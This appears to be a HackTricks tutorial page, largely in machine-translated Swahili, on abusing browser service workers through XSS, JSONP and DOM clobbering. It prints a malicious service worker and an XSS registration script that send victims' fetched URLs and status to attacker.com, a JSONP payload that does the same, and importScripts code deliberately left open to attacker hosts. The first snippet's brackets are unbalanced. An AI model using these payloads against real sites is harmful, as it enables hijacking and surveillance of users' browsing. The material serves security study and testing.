Abusing Service Workers

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

A service worker ni script inayotendewa na kivinjari chako katika mandharinyuma, tofauti na ukurasa wowote wa wavuti, ikiruhusu vipengele ambavyo havihitaji ukurasa wa wavuti au mwingiliano wa mtumiaji, hivyo kuboresha uwezo wa kazi za mbali na za mandharinyuma. Taarifa za kina kuhusu service workers zinaweza kupatikana hapa. Kwa kutumia service workers ndani ya eneo la wavuti lenye udhaifu, washambuliaji wanaweza kupata udhibiti juu ya mwingiliano wa mwathirika na kurasa zote ndani ya eneo hilo.

Checking for Existing Service Workers

Service workers waliopo wanaweza kuangaliwa katika sehemu ya Service Workers ya tab ya Application katika Developer Tools. Njia nyingine ni kutembelea chrome://serviceworker-internals kwa mtazamo wa kina zaidi.

Push Notifications

Ruhusa za arifa za kusukuma zinaathiri moja kwa moja uwezo wa service worker kuwasiliana na seva bila mwingiliano wa moja kwa moja wa mtumiaji. Ikiwa ruhusa zimekataliwa, inapunguza uwezo wa service worker kuleta tishio endelevu. Kinyume chake, kutoa ruhusa huongeza hatari za usalama kwa kuruhusu kupokea na kutekeleza exploit zinazoweza kutokea.

Attack Creating a Service Worker

Ili kutumia udhaifu huu unahitaji kutafuta:

Njia ya kupakia faili za JS zisizo na mpangilio kwenye seva na XSS ili kupakia service worker ya faili ya JS iliyopakiwa
Omba la JSONP lenye udhaifu ambapo unaweza kubadilisha matokeo (kwa kutumia msimbo wa JS zisizo na mpangilio) na XSS ili kupakia JSONP na payload ambayo it pakiwa service worker mbaya.

Katika mfano ufuatao nitawasilisha msimbo wa kujiandikisha service worker mpya ambayo itasikiliza tukio la fetch na it tuma kwa seva ya washambuliaji kila URL iliyopatikana (hiki ndicho msimbo unahitaji kupakia kwenye seva au kupakia kupitia jibu la JSONP lenye udhaifu):

self.addEventListener('fetch', function(e) {
e.respondWith(caches.match(e.request).then(function(response) {
fetch('https://attacker.com/fetch_url/' + e.request.url)
});

Na hii ndiyo code itakayoweza kuandikisha mfanyakazi (code unapaswa kuwa na uwezo wa kuendesha ukiitumia XSS). Katika kesi hii, ombi la GET litatumwa kwa seva ya washambuliaji kuarifu ikiwa kuandikishwa kwa mfanyakazi wa huduma kulifanikiwa au la:

<script>
window.addEventListener('load', function() {
var sw = "/uploaded/ws_js.js";
navigator.serviceWorker.register(sw, {scope: '/'})
.then(function(registration) {
var xhttp2 = new XMLHttpRequest();
xhttp2.open("GET", "https://attacker.com/SW/success", true);
xhttp2.send();
}, function (err) {
var xhttp2 = new XMLHttpRequest();
xhttp2.open("GET", "https://attacker.com/SW/error", true);
xhttp2.send();
});
});
</script>

Katika kesi ya kutumia mwisho wa JSONP ulio hatarini unapaswa kuweka thamani ndani ya var sw. Kwa mfano:

var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";

There is a C2 dedicated to the exploitation of Service Workers called Shadow Workers that will be very useful to abuse these vulnerabilities.

The 24-hour cache directive limits the life of a malicious or compromised service worker (SW) to at most 24 hours after an XSS vulnerability fix, assuming online client status. To minimize vulnerability, site operators can lower the SW script's Time-To-Live (TTL). Developers are also advised to create a service worker kill-switch for rapid deactivation.

Abusing `importScripts` in a SW via DOM Clobbering

The function importScripts called from a Service Worker can import a script from a different domain. If this function is called using a parameter that an attacker could modify he would be able to import a JS script from his domain and get XSS.

Hii hata inapita ulinzi wa CSP.

Example vulnerable code:

index.html

<script>
navigator.serviceWorker.register('/dom-invader/testcases/augmented-dom-import-scripts/sw.js' + location.search);
// attacker controls location.search
</script>

sw.js

const searchParams = new URLSearchParams(location.search);
let host = searchParams.get('host');
self.importScripts(host + "/sw_extra.js");
//host can be controllable by an attacker

Na DOM Clobbering

Kwa maelezo zaidi kuhusu kile DOM Clobbering ni angalia:

Dom Clobbering

Ikiwa URL/domain ambayo SW inatumia kuita importScripts iko ndani ya kipengele cha HTML, ni uwezekano wa kuibadilisha kupitia DOM Clobbering ili kufanya SW ipakue script kutoka kwa domain yako mwenyewe.

Kwa mfano wa hili angalia kiungo cha rejea.